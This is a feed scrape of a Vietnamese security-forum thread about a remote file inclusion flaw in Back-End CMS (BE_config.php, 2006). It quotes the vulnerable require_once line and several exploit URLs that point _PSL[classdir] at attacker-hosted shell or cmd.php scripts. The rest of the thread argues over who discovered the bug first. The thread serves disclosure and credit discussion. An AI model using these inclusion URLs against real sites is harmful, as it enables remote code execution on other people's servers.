<![CDATA[Latest posts for the topic "Back-End (BE_config.php) - Remote Include Files "]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Back-End (BE_config.php) - Remote Include Files http://back-end.org
http://www.example.com/BE_config.php?_PSL[classdir]=http://www.attachker/shell.php_? 
]]> /hvaonline/posts/list/503.html#1474 /hvaonline/posts/list/503.html#1474 GMT Re: Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#1779 /hvaonline/posts/list/503.html#1779 GMT Back-End (BE_config.php) - Remote Include Files http://www.devilteam.yum.pl # Site of script: http://www.back-end.org # #################################################################### */ BE_config.php Line 27-31: Code:
...
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
$scriptTimer = & pslSingleton('phpTimer');
$scriptTimer->start('main');
/* Use Example
...
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts] #Elo ;-) ExploitAlert Id : 633 Credit : Kacper http://securityreason.com/exploitalert/633 Date : 27.5.2006 Bạn Dũnglà chủ nhân hồi nào vậy?]]>
/hvaonline/posts/list/503.html#1783 /hvaonline/posts/list/503.html#1783 GMT
Back-End (BE_config.php) - Remote Include Files http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname ]]> /hvaonline/posts/list/503.html#1790 /hvaonline/posts/list/503.html#1790 GMT Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#1832 /hvaonline/posts/list/503.html#1832 GMT Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#1906 /hvaonline/posts/list/503.html#1906 GMT Back-End (BE_config.php) - Remote Include Files

H0angY3nXinhdep wrote:
Topic : Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability ExploitAlert Id : 633 Credit : Kacper Date : 27.5.2006 Download Exploit Code : ################# DEVIL TEAM THE BEST POLISH TEAM ################## # # Back-End CMS - Remote File Include Vulnerabilities # Find by Kacper (Rahim). # Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** # Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl # Site of script: http://www.back-end.org # #################################################################### */ BE_config.php Line 27-31: Code:
...
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
$scriptTimer = & pslSingleton('phpTimer');
$scriptTimer->start('main');
/* Use Example
...
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts] #Elo ;-) ExploitAlert Id : 633 Credit : Kacper http://securityreason.com/exploitalert/633 Date : 27.5.2006 Bạn Dũnglà chủ nhân hồi nào vậy? 
Ôi sorry! Thực lòng bug này cũng do mình hunt thực và post tai đây: http://forum.milw0rm.com/viewtopic.php?p=1531 Và củng public tại vniss.]]>
/hvaonline/posts/list/503.html#1921 /hvaonline/posts/list/503.html#1921 GMT
Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#1925 /hvaonline/posts/list/503.html#1925 GMT Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#1945 /hvaonline/posts/list/503.html#1945 GMT Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#2024 /hvaonline/posts/list/503.html#2024 GMT Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#2076 /hvaonline/posts/list/503.html#2076 GMT Re: Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#2081 /hvaonline/posts/list/503.html#2081 GMT Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#2184 /hvaonline/posts/list/503.html#2184 GMT Re: Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#2260 /hvaonline/posts/list/503.html#2260 GMT Back-End (BE_config.php) - Remote Include Files

H0angY3nXinhdep wrote:
Chẳng ai tự ti cả, VN có hàng tá người phát hiện bug ý chứ, tuy nhiên phát hiện thật thì phải công bố và credit rõ ràng lên securityfocus hay tracker để mọi người kiểm chứng 
OK, nói chung dungit chỉ thường hay sinh hoạt tai http://milw0rm.com nên post tại đó, và bug thuộc dạng này thì qua đơn giản để hunt thôi, bên mục 'thảo luận bảo mật' mình củng post nguyên nhân rồi, vì nó là 1 trong những bug mình thấy thì mình post lên đây thôi, chứ có gì đâu. Chuyện trùng nhau thì tình cờ, sao các bạn lại trách mình ghê thế ?( Vã lại mình hoàn toàn hiểu nguên nhân gân ra bug thuộc dạng này và nguyên nhân xãy ra exploit thì có gì mà mình phải đi lấy của người khác chứ)...]]>
/hvaonline/posts/list/503.html#2433 /hvaonline/posts/list/503.html#2433 GMT
Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#3037 /hvaonline/posts/list/503.html#3037 GMT Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#26003 /hvaonline/posts/list/503.html#26003 GMT Back-End (BE_config.php) - Remote Include Files

mrdung wrote:

H0angY3nXinhdep wrote:
Chẳng ai tự ti cả, VN có hàng tá người phát hiện bug ý chứ, tuy nhiên phát hiện thật thì phải công bố và credit rõ ràng lên securityfocus hay tracker để mọi người kiểm chứng 
OK, nói chung dungit chỉ thường hay sinh hoạt tai http://milw0rm.com nên post tại đó, và bug thuộc dạng này thì qua đơn giản để hunt thôi, bên mục 'thảo luận bảo mật' mình củng post nguyên nhân rồi, vì nó là 1 trong những bug mình thấy thì mình post lên đây thôi, chứ có gì đâu. Chuyện trùng nhau thì tình cờ, sao các bạn lại trách mình ghê thế ?( Vã lại mình hoàn toàn hiểu nguên nhân gân ra bug thuộc dạng này và nguyên nhân xãy ra exploit thì có gì mà mình phải đi lấy của người khác chứ)... 
Tôi nhận thấy chính dungit hunt được bug đó... trang http://milw0rm.com cũng đủ uy tín. Về khả năng của dungit thì tôi thấy rất khá, qua những gì tôi thấy truớc đây ]]>
/hvaonline/posts/list/503.html#26036 /hvaonline/posts/list/503.html#26036 GMT
Back-End (BE_config.php) - Remote Include Files /hvaonline/posts/list/503.html#27907 /hvaonline/posts/list/503.html#27907 GMT